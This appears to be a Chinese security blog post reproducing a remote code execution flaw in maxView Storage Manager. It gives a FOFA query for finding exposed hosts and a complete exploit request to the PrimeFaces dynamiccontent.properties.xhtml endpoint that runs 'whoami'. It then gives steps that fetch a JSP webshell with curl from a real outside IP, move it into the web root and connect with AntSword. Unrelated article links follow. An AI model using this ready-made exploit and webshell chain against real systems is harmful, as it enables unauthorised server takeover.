当前位置: 首页 > news >正文

【漏洞复现】maxView Storage Manager 远程代码执行漏洞

        maxView Storage Manager使查看、监控和配置系统中基于Microsemi RAID适配器构建的所有存储变得简单。⽅便的图形⽤户界⾯(GUI)在Microsemi产品线和⽀持的操作系统(包括
Windows、Linux、VMWare和Solaris)中的外观和操作都相同。使⽤此单⼀⼯具集中管理直连存储(DAS)和⽹络存储。此外,还可通过maxCache SSD Caching管理现有卷的⾼级缓存池,并通过Adaptec Intelligent Power Management管理存储功耗。


》》》漏洞描述《《《

        maxView Storage Manager系统dynamiccontent.properties.xhtm)存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执
行任意代码获取服务器权限。


》》》影响范围《《《

maxView Storage Manager系统


》》》环境搭建《《《

fofa:"maxView Storage Manager - Login"


》》》漏洞复现《《《

poc数据包POST /maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
360SE)
Connection: close
Content-Length: 1567
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzippfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami

GetShell

远程下载jsp⽊⻢
curl http://8.130.83.3:8001/peak.jsp -o ggg.jsp

dir查看⽬录,找到⽹站⽬录

将ggg.php移动到当前⽬录

蚁剑连接,GetShell


相关文章:

  • 51单片机—智能垃圾桶(定时器)
  • Linux磁盘管理_文件系统
  • MySQL1 DDL数据定义语言
  • Linux 安装指南
  • 驰骋BPM RunSQL_Init接口SQL注入漏洞复现 [附POC]
  • ArcGIS基础:自定义创建点线面等样式符号以方便使用
  • MySQL笔记(八):事务
  • 项目功能点
  • 服务器磁盘扩容
  • [算法题]火星词典
  • Mysql-窗口函数二
  • 图的拓扑排序
  • RabbitMQ如何保证可靠性
  • 文档控件DevExpress Office File API v24.1 - 支持基于Unix系统的打印
  • 正则表达式扩展应用
  • C++类的相互关联
  • export和import的用法总结
  • Git同步原始仓库到Fork仓库中
  • JAVA多线程机制解析-volatilesynchronized
  • js对象的深浅拷贝
  • js作用域和this的理解
  • PV统计优化设计
  • QQ浏览器x5内核的兼容性问题
  • React Native移动开发实战-3-实现页面间的数据传递
  • Vue2.0 实现互斥
  • webpack项目中使用grunt监听文件变动自动打包编译
  • 百度地图API标注+时间轴组件
  • 深入体验bash on windows,在windows上搭建原生的linux开发环境,酷!
  • 写给高年级小学生看的《Bash 指南》
  • 用jquery写贪吃蛇
  • ​DB-Engines 12月数据库排名: PostgreSQL有望获得「2020年度数据库」荣誉?
  • ​LeetCode解法汇总2670. 找出不同元素数目差数组
  • ​Spring Boot 分片上传文件
  • # C++之functional库用法整理
  • $.type 怎么精确判断对象类型的 --(源码学习2)
  • (1)(1.19) TeraRanger One/EVO测距仪
  • (1)Jupyter Notebook 下载及安装
  • (1)SpringCloud 整合Python
  • (4)事件处理——(6)给.ready()回调函数传递一个参数(Passing an argument to the .ready() callback)...
  • (附源码)springboot人体健康检测微信小程序 毕业设计 012142
  • (附源码)ssm户外用品商城 毕业设计 112346
  • (含笔试题)深度解析数据在内存中的存储
  • (亲测有效)推荐2024最新的免费漫画软件app,无广告,聚合全网资源!
  • (原创)boost.property_tree解析xml的帮助类以及中文解析问题的解决
  • (转)AS3正则:元子符,元序列,标志,数量表达符
  • (转)IOS中获取各种文件的目录路径的方法
  • (转)关于如何学好游戏3D引擎编程的一些经验
  • (转)我也是一只IT小小鸟
  • *上位机的定义
  • .mkp勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
  • .NET 5种线程安全集合
  • .net core IResultFilter 的 OnResultExecuted和OnResultExecuting的区别
  • .NET Framework与.NET Framework SDK有什么不同?
  • .NET 漏洞分析 | 某ERP系统存在SQL注入
  • .NET 设计模式—适配器模式(Adapter Pattern)